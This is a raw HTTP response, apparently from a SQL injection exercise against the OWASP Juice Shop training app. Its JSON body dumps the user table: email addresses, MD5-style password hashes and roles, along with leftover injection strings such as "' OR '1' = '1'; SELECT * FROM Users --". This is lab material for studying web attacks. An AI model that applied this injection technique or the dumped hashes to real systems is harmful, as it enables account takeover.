HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
ETag: W/"1307-Pn2ufsd0wC3DcQCZdXQ3EFrie6U"
Vary: Accept-Encoding
Date: Sat, 19 Nov 2022 11:06:21 GMT
Connection: close
Content-Length: 4871

{"status":"success","data":[{"id":"'","name":"a9a615490b58caec51a269fbddac2832","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"J12934@juice-sh.op","name":"3c2abc04e4a6ea8f1327d0aae3714b7d","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"accountant@juice-sh.op","name":"963e10f92a70b4b463220cb4c5d636dc","description":"accounting","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"admin@juice-sh.op","name":"0192023a7bbd73250516f069df18b500","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"amy@juice-sh.op","name":"030f05e45e30710c3ad3c32f00de0473","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"bender@juice-sh.op","name":"0c36e517e3fa95aabf1bbffc6744a4ef","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"bjoern.kimminich@gmail.com","name":"6edd9d726cbdc873c539e41ae8757b8c","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"bjoern@juice-sh.op","name":"7f311911af16fa8f418dd1a3051d6810","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"bjoern@owasp.org","name":"9283f1b2e9669749081963be0462e466","description":"deluxe","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"chris.pike@juice-sh.op","name":"10a783b9ed19ea1c67c3a27699f0095b","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"ciso@juice-sh.op","name":"861917d5fa5f1172f931dc700d81a8fb","description":"deluxe","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"demo","name":"fe01ce2a7fbac8fafaed7c982a04e229","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"emma@juice-sh.op","name":"402f1c4a75e316afec5a6ea63147f739","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"jim@juice-sh.op","name":"e541ca7ecf72b8d1286474fc613e5e45","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"john@juice-sh.op","name":"00479e957b6b42c459ee5746478e4d45","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"mc.safesearch@juice-sh.op","name":"b03f4b0ba8b458fa0acdc02cdb953bc8","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"morty@juice-sh.op","name":"f2f933d0bb0ba057bc8e33b8ebd6d9e8","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"stan@juice-sh.op","name":"e9048a3f43dd5e094ef733f3bd88ea64","description":"deluxe","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"support@juice-sh.op","name":"3869433d74e3d0c86fd25562f836bc82","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"uvogin@juice-sh.op","name":"05f92148b4b60f7dacd04cceebb8f1af","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"vishesh@gmail.com","name":"a9a615490b58caec51a269fbddac2832","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"vishsh'","name":"a9a615490b58caec51a269fbddac2832","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"vishsh' OR '1' = '1'; SELECT * FROM Users --","name":"a9a615490b58caec51a269fbddac2832","description":"customer","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"},{"id":"wurstbrot@juice-sh.op","name":"9ad5b0492bbe528583e128d2a8941de4","description":"admin","price":"test","deluxePrice":"test","image":"test","createdAt":"test","updatedAt":"test","deletedAt":"test"}]}